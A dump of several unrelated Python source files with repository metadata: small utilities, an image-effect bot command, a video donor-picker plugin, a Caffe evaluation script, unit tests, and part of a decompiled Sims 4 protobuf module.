5f9c577bd20e78c6c12bbdda22baa4f5a81a595e | 618 | py | Python | Python/Armstrong_Number.py | shashwat-agarwal/hacktoberfest-2 | 552a4278ffd671603f8659562427b0f1ac5127a4 | [
"Apache-2.0"
] | 17 | 2020-10-02T03:28:33.000Z | 2020-10-24T04:08:30.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | [
"Apache-2.0"
] | 22 | 2020-10-01T20:00:56.000Z | 2020-10-31T01:56:10.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | [
"Apache-2.0"
] | 139 | 2020-10-01T19:51:40.000Z | 2020-11-02T19:58:19.000Z | #Program to check whether the number is an armstrong number or not
#Ask user to enter the number
number=int(input("Enter the number you want to check armstrong: "))
#To calculate the length of number entered.
order=len(str(number))
#Initialise sum to 0
sum=0
temp=number
while temp>0:
num=temp%10
sum+=num**order
temp//=10
if (number==sum):
print("The number you have entered is an Armstrong number.")
else:
print("The number you have entered is not an Armstrong number.")
#OUTPUT:
#Enter the number you want to check armstrong: 1634
#The number you have entered is an Armstrong number.
| 21.310345 | 68 | 0.723301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 429 | 0.694175 |
5f9c87648a4e17596d684c15485c9c92d81abb57 | 304 | py | Python | pyexlatex/models/format/hline.py | whoopnip/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | 4 | 2020-06-08T07:17:12.000Z | 2021-11-04T21:39:52.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | 24 | 2020-02-17T17:20:44.000Z | 2021-12-20T00:10:19.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | null | null | null | from pyexlatex.models.sizes.textwidth import TextWidth
from pyexlatex.models.format.rule import Rule
class HLine(Rule):
"""
Draws a horizontal line across the text width.
"""
def __init__(self, thickness: float = 0.4):
super().__init__(length=TextWidth(), thickness=thickness)
| 25.333333 | 65 | 0.710526 | 200 | 0.657895 | 0 | 0 | 0 | 0 | 0 | 0 | 62 | 0.203947 |
5f9d943e1c5e5e036c07d0eb1ed8c96b9fd06019 | 4,038 | py | Python | sixx/plugins/images.py | TildeBeta/6X | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 2 | 2018-03-06T20:39:49.000Z | 2018-03-17T04:28:57.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 2 | 2018-03-06T20:39:46.000Z | 2018-03-15T17:03:03.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 1 | 2018-04-25T22:24:40.000Z | 2018-04-25T22:24:40.000Z | from math import sqrt
import asks
import datetime
import numpy as np
import random
from PIL import Image
from PIL.ImageDraw import Draw
from PIL.ImageEnhance import Brightness
from PIL.ImageFont import truetype
from curio import spawn_thread
from curious.commands import Context, Plugin, command
from io import BytesIO
from sixx.plugins.utils.pillow import add_noise, add_scanlines, antialiased_text, save_image
SCANLINES, NOISE, BOTH = range(3)
class Images(Plugin):
"""
Commands for image manipulation stuffs.
"""
@command()
async def vcr(self, ctx: Context, *, url: str):
# TODO support attachments
buffer = BytesIO()
resp = await asks.get(url, stream=True)
async for chunk in resp.body:
buffer.write(chunk)
async with ctx.channel.typing:
async with spawn_thread():
with Image.open(buffer) as image:
filter = np.random.choice(range(3), p=[0.7, 0.2, 0.1])
if filter == SCANLINES:
image = add_scanlines(image)
elif filter == NOISE:
image = add_noise(image)
else:
image = add_scanlines(image)
image = add_noise(image)
Brightness(image).enhance(2.5)
# hoo boy
text = np.random.choice(['PLAY', ' PAUSE'], p=[0.8, 0.2])
font = truetype('VCR_OSD_MONO.ttf', size=int(min(image.size) / 10))
start = datetime.datetime(1980, 1, 1, 0, 0)
now = datetime.datetime.utcnow()
# https://stackoverflow.com/a/8170651/7581432
random_date = start + datetime.timedelta(seconds=random.randint(0, int((now - start).total_seconds())))
topleft_text = antialiased_text(text, font, image.width, image.height, offset_x=1 / 30, offset_y=1 / 15)
image.paste(topleft_text, (0, 0), mask=topleft_text)
draw = Draw(image)
if text == 'PLAY':
width, height = font.getsize(text)
offset_x = width + image.width * (1 / 30) * 1.5
offset_y = image.height * (1 / 15)
draw.polygon(
[
(offset_x, offset_y),
(offset_x, offset_y + height),
(offset_x + sqrt(height ** 2 - (height / 2) ** 2), offset_y + height / 2)
],
fill=(255, 255, 255)
)
else:
_, height = font.getsize(' ')
offset_x = image.width * (1 / 35)
offset_y = image.height * (1 / 15)
part = (height - offset_x / 2) / 8
draw.rectangle(
[(offset_x, offset_y + part), (offset_x + 3 * part, offset_y - part + height)],
fill=(255, 255, 255))
draw.rectangle(
[(offset_x + 5 * part, offset_y + part), (offset_x + 8 * part, offset_y - part + height)],
fill=(255, 255, 255))
# This is a nasty hack but oh well
time, date = random_date.strftime('%H:%M|%b. %d %Y').split('|')
wrap_width = len(date)
botleft_text = antialiased_text(time.ljust(wrap_width + 1) + date, font, image.width, image.height,
offset_x=1 / 35, offset_y=13 / 15, wrap_width=wrap_width)
image.paste(botleft_text, (0, 0), mask=botleft_text)
buffer = save_image(image, format=image.format)
await ctx.channel.messages.upload(buffer, filename='shoutouts.' + image.format)
| 40.38 | 124 | 0.488856 | 3,586 | 0.888063 | 0 | 0 | 3,499 | 0.866518 | 3,484 | 0.862803 | 244 | 0.060426 |
5f9df6e37fc71858adef3ee969afe3699916d4a6 | 2,669 | py | Python | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | import logging
from maskgen import video_tools
import random
import maskgen.video_tools
import os
import maskgen
import json
plugin = "DonorPicker"
def transform(img, source, target, **kwargs):
valid = []
possible = []
data = {}
logging.getLogger('maskgen').info(str(kwargs))
for f in os.listdir(kwargs['Directory']):
if os.path.splitext(f)[1] == '.json':
data = json.load(open(os.path.join(kwargs['Directory'],f)))
elif video_tools.get_shape_of_video(os.path.join(kwargs['Directory'], f)) == video_tools.get_shape_of_video(source):
possible.append(os.path.join(kwargs['Directory'],f))
for d in possible:
if os.path.split(d)[1] in data:
valid.append(d)
if len(valid) == 0:
raise ValueError('No donors of correct size available')
donor = valid[0]
if kwargs['Pick Preference'] == 'Random':
donor = valid[random.randint(0,len(valid)-1)]
elif kwargs['Pick Preference'] == 'By Name':
for v in valid:
if os.path.splitext(source)[0] in (os.path.split(v)[1]):
donor = v
elif kwargs['Pick Preference'] =='Specific':
donor = kwargs['Donator']
data = data[os.path.split(donor)[1]]
data['Donator'] = donor
logging.getLogger('maskgen').info("Donor Selected: {}".format(donor))
#shutil.copy((os.path.join(kwargs['Directory'],f)),os.path.join(scenario_model.get, f))
#result, err = callPlugin(kwargs['Plugin'],img,source,target,**kwargs)
#final = {k: v for d in [result, data] for k, v in d.items()} if result is not None else data
logging.getLogger('maskgen').info(str(data))
#os.remove(os.path.join(".", f))
return data,None
def operation():
return {'name': 'SelectRegion',
'category': 'Select',
'type': 'Selector',
'description': 'Pick a donor and other data from a directory',
'software': 'Maskgen',
'version': maskgen.__version__,
'arguments': {
'Directory': {
'type': 'file',
'defaultvalue': '.',
'description': 'Directory full of possible PRNU choices'
},
'Pick Preference': {
'type': 'list',
'values': ['Random', 'By Name', 'Specific'],
'defaultvalue': 'Random',
'description': 'Select the deciding factor for which video will be selected from the directory'
}
},
'transitions': [
'video.video'
'image.image'
]
} | 38.128571 | 124 | 0.557887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 990 | 0.370925 |
5f9e0f831db1b36f8edc783c6c1bfaa61c116474 | 1,228 | py | Python | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 31 | 2017-09-13T13:40:59.000Z | 2022-01-25T16:55:19.000Z | track_model/eval_avg_scores.py | zhenyangli/lang-tracker | dddd808a22582573ab0a5e4c3dbf0ba054e42d61 | [
"BSD-3-Clause"
] | 4 | 2017-09-14T01:56:58.000Z | 2021-01-28T00:58:58.000Z | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 9 | 2017-09-28T03:22:08.000Z | 2021-01-19T10:56:44.000Z | import caffe
import numpy as np
import os
import sys
import track_model_train as track_model
import train_config
max_iter = 1000
def eval_avg_scores(config):
with open('./track_model/scores.prototxt', 'w') as f:
f.write(str(track_model.generate_scores('', config)))
caffe.set_device(config.gpu_id)
caffe.set_mode_gpu()
# Load pretrained model
scores_net = caffe.Net('./track_model/scores.prototxt',
config.weights,
caffe.TEST)
#import ipdb; ipdb.set_trace()
scores = 0
num_sample = 0
for it in range(max_iter):
scores_net.forward()
scores_val = scores_net.blobs['fcn_scores'].data[...].copy()
scores += scores_val.sum()
num_sample += scores_val.size
# ALOV conv345 -> 0.01196
# OTB50 scores = 72313495.437500, samples = 1936000, avg_score = 37.364085 -> 0.02676
# ILSVRC scores = 66083375.812500, samples = 1936000, avg_score = 34.133975 -> 0.02929
avg_score = scores / num_sample
print('\tscores = %f, samples = %d, avg_score = %f\t'
% (scores, num_sample, avg_score))
if __name__ == '__main__':
config = train_config.Config()
eval_avg_scores(config)
| 29.95122 | 90 | 0.643322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 386 | 0.314332 |
5f9e1b47610239b65145f24fa61ab7d89533b94e | 1,968 | py | Python | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 1 | 2018-05-31T17:29:30.000Z | 2018-05-31T17:29:30.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 8 | 2015-02-20T16:22:12.000Z | 2019-04-25T23:57:43.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 8 | 2015-02-28T06:56:15.000Z | 2020-01-02T22:42:09.000Z | #
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mock import patch
import conjur
api = conjur.new_from_key('foo', 'bar')
group = api.group('v1/admins')
def test_group():
assert group.role.kind == 'group'
assert group.role.identifier == 'v1/admins'
assert group.role.roleid == api.config.account + ':group:v1/admins'
@patch.object(group.role, 'grant_to')
def test_add_member(mock_grant_to):
member = api.user('foo')
group.add_member(member)
mock_grant_to.assert_called_with(member, False)
@patch.object(group.role, 'grant_to')
def test_add_member_admin(mock_grant_to):
member = api.role('something', 'else')
group.add_member(member, True)
mock_grant_to.assert_called_with(member, True)
@patch.object(group.role, 'revoke_from')
def test_remove_member(mock_revoke_from):
member = api.user('foo')
group.remove_member(member)
mock_revoke_from.assert_called_with(member)
| 37.132075 | 82 | 0.757622 | 0 | 0 | 0 | 0 | 582 | 0.295732 | 0 | 0 | 1,187 | 0.60315 |
5f9e9628295536489ee271571858b5c113c24c7c | 99,362 | py | Python | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: D:\dev\TS4\_deploy\Client\Releasex64\Python\Generated\protocolbuffers\Social_pb2.py
# Compiled at: 2020-12-13 14:24:09
# Size of source mod 2**32: 103336 bytes
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
import protocolbuffers.Consts_pb2 as Consts_pb2
import protocolbuffers.Chat_pb2 as Chat_pb2
import protocolbuffers.S4Common_pb2 as S4Common_pb2
import protocolbuffers.Localization_pb2 as Localization_pb2
import protocolbuffers.Exchange_pb2 as Exchange_pb2
DESCRIPTOR = descriptor.FileDescriptor(name='Social.proto',
package='EA.Sims4.Network',
serialized_pb='\n\x0cSocial.proto\x12\x10EA.Sims4.Network\x1a\x0cConsts.proto\x1a\nChat.proto\x1a\x0eS4Common.proto\x1a\x12Localization.proto\x1a\x0eExchange.proto"v\n\x0fSocialFriendMsg\x12\r\n\x05simId\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x0c\n\x04note\x18\x03 \x01(\t\x12\x0e\n\x06prefix\x18\x04 \x01(\t\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x12\n\ncheatForce\x18\x06 \x01(\x08",\n\x18SocialPersonaResponseMsg\x12\x10\n\x08personas\x18\x01 \x03(\t"\x7f\n\x15SocialGenericResponse\x12\r\n\x05error\x18\x01 \x01(\r\x121\n\x08msg_type\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x0e\n\x06postId\x18\x03 \x01(\x0c\x12\x14\n\x0cpostParentId\x18\x04 \x01(\x0c"¼\x02\n\x14SocialPlayerInfoList\x12B\n\x07players\x18\x01 \x03(\x0b21.EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo\x1aß\x01\n\nPlayerInfo\x12\x13\n\x0bAccountName\x18\x01 \x01(\t\x12\x14\n\x0cAccountNotes\x18\x02 \x01(\t\x128\n\x08presence\x18\x03 \x01(\x0e2&.EA.Sims4.Network.OnlinePresenceStatus\x12\x15\n\rOnlineStatus2\x18\x04 \x01(\t\x12\x11\n\tNucleusId\x18\t \x01(\x04\x12\x11\n\tPlayerBio\x18\n \x01(\t\x12\x18\n\x10exclude_reported\x18\x0b \x01(\x08\x12\x15\n\rIsUserBlocked\x18\x0c \x01(\x08"a\n\x0fSocialSearchMsg\x12\x0e\n\x06prefix\x18\x01 \x01(\t\x12>\n\x0esearch_results\x18\x02 \x03(\x0b2&.EA.Sims4.Network.LocalizedStringToken"=\n\x12OriginErrorMessage\x12\x11\n\terrorcode\x18\x01 \x01(\r\x12\x14\n\x0cerrormessage\x18\x02 \x01(\t"\x97\x01\n\x1bSocialInviteResponseMessage\x12\x14\n\x0cinvitationid\x18\x01 \x01(\t\x12\x16\n\x0einvitationtype\x18\x02 \x01(\r\x12\x18\n\x10inviternucleusid\x18\x03 \x01(\x04\x12\x19\n\x11accepternucleusid\x18\x04 \x01(\x04\x12\x15\n\ractionSuccess\x18\x05 \x01(\x08"J\n\x13SocialCassandraTest\x123\n\x06opcode\x18\x01 \x01(\x0e2#.EA.Sims4.Network.CassandraTestCode"\x88\x01\n\x1eSocialFriendListRequestMessage\x12\x12\n\naccount_id\x18\x01 \x01(\x04\x12\x11\n\tfriend_id\x18\x02 \x01(\x04\x12\x13\n\x0baddress_str\x18\x03 \x01(\t\x12\x12\n\nobject_str\x18\x04 \x01(\t\x12\x16\n\x0ereply_proxy_id\x18\x05 \x01(\x04"_\n!SocialRequestNucleusIdFromPersona\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x13\n\x0bpersonaName\x18\x02 \x01(\t\x12\x12\n\nmessage_id\x18\x03 \x01(\r"^\n"SocialNucleusIdFromPersonaResponse\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x12\n\nmessage_id\x18\x03 \x01(\r"S\n\x15SocialExchangeMessage\x12:\n\x08envelope\x18\x01 \x01(\x0b2(.EA.Sims4.Network.ExchangeSocialEnvelope"+\n\x16SocialFollowersMessage\x12\x11\n\tsfim_blob\x18\x01 \x03(\x0c"Û\x02\n\x15SocialFeedItemMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x127\n\tfeed_type\x18\x02 \x01(\x0e2$.EA.Sims4.Network.SocialFeedItemType\x120\n\x08metadata\x18\x03 \x01(\x0b2\x1e.EA.Sims4.Network.TrayMetadata\x12\x11\n\tnucleusid\x18\x04 \x01(\x04\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x04\x12\x1a\n\x12follower_nucleusid\x18\x07 \x01(\x04\x12\x18\n\x10follower_persona\x18\x08 \x01(\t\x12@\n\x0efollowers_blob\x18\t \x01(\x0b2(.EA.Sims4.Network.SocialFollowersMessage\x12\x18\n\x10is_maxis_curated\x18\n \x01(\x08"Z\n!SocialFeedItemUnserializedMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x12\x0c\n\x04data\x18\x02 \x01(\x0c\x12\x16\n\x0ecount_override\x18\x03 \x01(\x04"d\n\x18SocialWallCommentMessage\x12\x0c\n\x04uuid\x18\x01 \x01(\x0c\x12\x11\n\tauthor_id\x18\x02 \x01(\x04\x12\x16\n\x0eauthor_persona\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t"Ù\x01\n\x1cSocialGetWallCommentsMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x15\n\rstarting_uuid\x18\x03 \x01(\x0c\x12\x13\n\x0bnum_results\x18\x04 \x01(\r\x12<\n\x08messages\x18\x05 \x03(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage\x12\x0e\n\x06hidden\x18\x06 \x01(\x08\x12\x18\n\x10exclude_reported\x18\x07 \x01(\x08"\x82\x01\n\x1cSocialPostWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12;\n\x07message\x18\x03 \x01(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage"U\n\x1eSocialDeleteWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x0c\n\x04uuid\x18\x03 \x01(\x0c"Õ\x01\n\x1cSocialRequestFeedWallMessage\x12\x13\n\x0bending_uuid\x18\x01 \x01(\x0c\x129\n\x08messages\x18\x02 \x03(\x0b2\'.EA.Sims4.Network.SocialFeedItemMessage\x12R\n\x15unserialized_messages\x18\x03 \x03(\x0b23.EA.Sims4.Network.SocialFeedItemUnserializedMessage\x12\x11\n\tnum_items\x18\x04 \x01(\r"m\n\x1dSocialRequestFollowersMessage\x12\x10\n\x08playerid\x18\x01 \x01(\x04\x12\n\n\x02id\x18\x02 \x01(\t\x12\x19\n\x11prev_last_persona\x18\x03 \x01(\t\x12\x13\n\x0bnum_request\x18\x04 \x01(\r";\n\x1eSocialRequestIgnoreListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04"é\x01\n\x1eSocialGetPlayerInfoListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04\x12U\n\x10player_info_list\x18\x02 \x03(\x0b2;.EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo\x1aU\n\nPlayerInfo\x12\x12\n\nnucleus_id\x18\x01 \x01(\x04\x12\x16\n\x0eorigin_persona\x18\x02 \x01(\t\x12\x1b\n\x13first_party_persona\x18\x03 \x01(\t"X\n\x1cSocialCommentPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x11\n\tcommentid\x18\x02 \x01(\x0c\x12\x12\n\ncommentKey\x18\x03 \x01(\t"D\n\x18SocialBioPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x15\n\rbio_nucleusid\x18\x02 \x01(\x04"+\n\x18SocialFeedRemovalMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c"\x8f\x12\n\x14SocialControlMessage\x12/\n\x06opcode\x18\x01 \x02(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12.\n\x05subop\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x15\n\rtransactionId\x18\x03 \x01(\x04\x12\x0e\n\x06result\x18d \x01(\r\x12J\n\x12getwallcommentsmsg\x18\x04 \x01(\x0b2..EA.Sims4.Network.SocialGetWallCommentsMessage\x12J\n\x12postwallcommentmsg\x18\x05 \x01(\x0b2..EA.Sims4.Network.SocialPostWallCommentMessage\x12N\n\x14deletewallcommentmsg\x18\x06 \x01(\x0b20.EA.Sims4.Network.SocialDeleteWallCommentMessage\x124\n\tfriendmsg\x18\x07 \x01(\x0b2!.EA.Sims4.Network.SocialFriendMsg\x12@\n\x0fgenericresponse\x18\x08 \x01(\x0b2\'.EA.Sims4.Network.SocialGenericResponse\x12:\n\nplayerinfo\x18\t \x01(\x0b2&.EA.Sims4.Network.SocialPlayerInfoList\x12:\n\nfeedsubmsg\x18\n \x01(\x0b2&.EA.Sims4.Network.SocialFeedSubMessage\x12:\n\x0fsearchresultmsg\x18\x0b \x01(\x0b2!.EA.Sims4.Network.SocialSearchMsg\x12H\n\x11inviteresponsemsg\x18\x0c \x01(\x0b2-.EA.Sims4.Network.SocialInviteResponseMessage\x129\n\x0boriginerror\x18\r \x01(\x0b2$.EA.Sims4.Network.OriginErrorMessage\x12B\n\x13socialcassandratest\x18\x0e \x01(\x0b2%.EA.Sims4.Network.SocialCassandraTest\x12T\n\x1asocialfriendlistrequestmsg\x18\x0f \x01(\x0b20.EA.Sims4.Network.SocialFriendListRequestMessage\x12^\n!socialrequestnucleusidfrompersona\x18\x10 \x01(\x0b23.EA.Sims4.Network.SocialRequestNucleusIdFromPersona\x12`\n"socialnucleusidfrompersonaresponse\x18\x11 \x01(\x0b24.EA.Sims4.Network.SocialNucleusIdFromPersonaResponse\x12F\n\x15socialexchangemessage\x18\x12 \x01(\x0b2\'.EA.Sims4.Network.SocialExchangeMessage\x12T\n\x1csocialrequestfeedwallmessage\x18\x13 \x01(\x0b2..EA.Sims4.Network.SocialRequestFeedWallMessage\x12A\n\x0cstat_tickers\x18\x15 \x01(\x0b2+.EA.Sims4.Network.ExchangeStatTickerMessage\x12L\n\x14comment_petition_msg\x18\x16 \x01(\x0b2..EA.Sims4.Network.SocialCommentPetitionMessage\x12B\n\x0efeedremovalmsg\x18\x17 \x01(\x0b2*.EA.Sims4.Network.SocialFeedRemovalMessage\x12D\n\x10bio_petition_msg\x18\x18 \x01(\x0b2*.EA.Sims4.Network.SocialBioPetitionMessage\x12B\n\x0cfb_event_msg\x18\x19 \x01(\x0b2,.EA.Sims4.Network.SocialFacebookEventMessage\x12M\n\x14requestfollowers_msg\x18\x1a \x01(\x0b2/.EA.Sims4.Network.SocialRequestFollowersMessage\x12O\n\x15responsefollowers_msg\x18\x1b \x01(\x0b20.EA.Sims4.Network.SocialResponseFollowersMessage\x12O\n\x15requestignorelist_msg\x18\x1c \x01(\x0b20.EA.Sims4.Network.SocialRequestIgnoreListMessage\x12W\n\x1dresponse_player_info_list_msg\x18\x1d \x01(\x0b20.EA.Sims4.Network.SocialGetPlayerInfoListMessage\x12_\n\x1eplayer_identification_list_msg\x18\x1e \x01(\x0b27.EA.Sims4.Network.ServerPlayerIdentificationListMessage\x12@\n\rcandidate_msg\x18\x1f \x01(\x0b2).EA.Sims4.Network.SocialCandidatesMessage\x12P\n\x16evaluation_results_msg\x18 \x01(\x0b20.EA.Sims4.Network.SocialEvaluationResultsMessage\x12>\n\rcg_update_msg\x18! \x01(\x0b2\'.EA.Sims4.Network.SocialCGUpdateMessage"7\n\x13SocialInvalidateMsg\x12\x13\n\x0bcache_index\x18\x01 \x01(\r\x12\x0b\n\x03key\x18\x02 \x01(\x0c"t\n"SocialControlQueueBroadcastMessage\x127\n\x07control\x18\x01 \x01(\x0b2&.EA.Sims4.Network.SocialControlMessage\x12\x15\n\tfriendIds\x18\x03 \x03(\x04B\x02\x10\x01"5\n\x10LifeEventMessage\x12\x0c\n\x04type\x18\x01 \x01(\r\x12\x13\n\x07sim_ids\x18\x02 \x03(\x06B\x02\x10\x01"Q\n\x1aSocialFacebookEventMessage\x12\x10\n\x08objectId\x18\x01 \x02(\t\x12\x13\n\x0baccessToken\x18\x02 \x02(\t\x12\x0c\n\x04guid\x18\x03 \x02(\t"¹\x01\n"SocialCandidateStatisticSubmessage\x12\x11\n\tremote_id\x18\x01 \x01(\x0c\x12\x13\n\x0bviews_count\x18\x02 \x01(\r\x12\x12\n\nwins_count\x18\x03 \x01(\r\x12\x10\n\x08platform\x18\x04 \x01(\r\x12\x10\n\x08category\x18\x05 \x01(\r\x12\x18\n\x0cwas_reported\x18\x06 \x01(\x08B\x02\x18\x01\x12\x19\n\x11expires_epoch_sec\x18\x07 \x01(\x04"ì\x01\n\x17SocialCandidatesMessage\x12\r\n\x05count\x18\x01 \x01(\r\x12\x1c\n\x14platform_restriction\x18\x02 \x01(\r\x12\x1c\n\x14category_restriction\x18\x03 \x01(\r\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x0e\n\x06digest\x18\x05 \x01(\x0c\x12H\n\ncandidates\x18\x06 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage\x12\x19\n\x11expire_epoch_secs\x18\x07 \x01(\x04"W\n\x1eSocialEvaluationResultsMessage\x12\x12\n\nwinner_ids\x18\x01 \x03(\t\x12\x11\n\tloser_ids\x18\x02 \x03(\t\x12\x0e\n\x06digest\x18\x03 \x01(\x0c"t\n\x15SocialCGDigestMessage\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12H\n\ncandidates\x18\x02 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage*¾\x01\n\x12SocialFeedItemType\x12\x17\n\x13SFI_ITEM_DOWNLOADED\x10\x00\x12\x15\n\x11SFI_ITEM_UPLOADED\x10\x01\x12\x16\n\x12SFI_ITEM_FAVORITED\x10\x02\x12\x16\n\x12SFI_ITEM_COMMENTED\x10\x03\x12\x16\n\x12SFI_ITEM_SHOWCASED\x10\x04\x12\x19\n\x15SFI_PROFILE_COMMENTED\x10\x05\x12\x15\n\x11SFI_NEW_FOLLOWERS\x10\x06*\x86\x02\n\x18SocialClusterMessageType\x12\r\n\tSOC_LOGIN\x10\x00\x12\x0e\n\nSOC_LOGOFF\x10\x01\x12\x16\n\x12SOC_PRESENCEUPDATE\x10\x02\x12\x12\n\x0eSOC_FEEDUPDATE\x10\x03\x12\x13\n\x0fSOC_ADD_FEEDSUB\x10\x04\x12\x16\n\x12SOC_REMOVE_FEEDSUB\x10\x05\x12\x18\n\x14SOC_BROADCAST_PRIVOP\x10\x06\x12\x18\n\x14SOC_BROADCAST_QUEUED\x10\x08\x12"\n\x1eSOC_BROADCAST_CACHE_INVALIDATE\x10\t\x12\x1a\n\x16SOC_REST_USER_REGISTER\x10\n')
_SOCIALFEEDITEMTYPE = descriptor.EnumDescriptor(name='SocialFeedItemType',
full_name='EA.Sims4.Network.SocialFeedItemType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SFI_ITEM_DOWNLOADED',
index=0,
number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_UPLOADED',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_FAVORITED',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_COMMENTED',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_SHOWCASED',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_PROFILE_COMMENTED',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_NEW_FOLLOWERS',
index=6,
number=6,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6663,
serialized_end=6853)
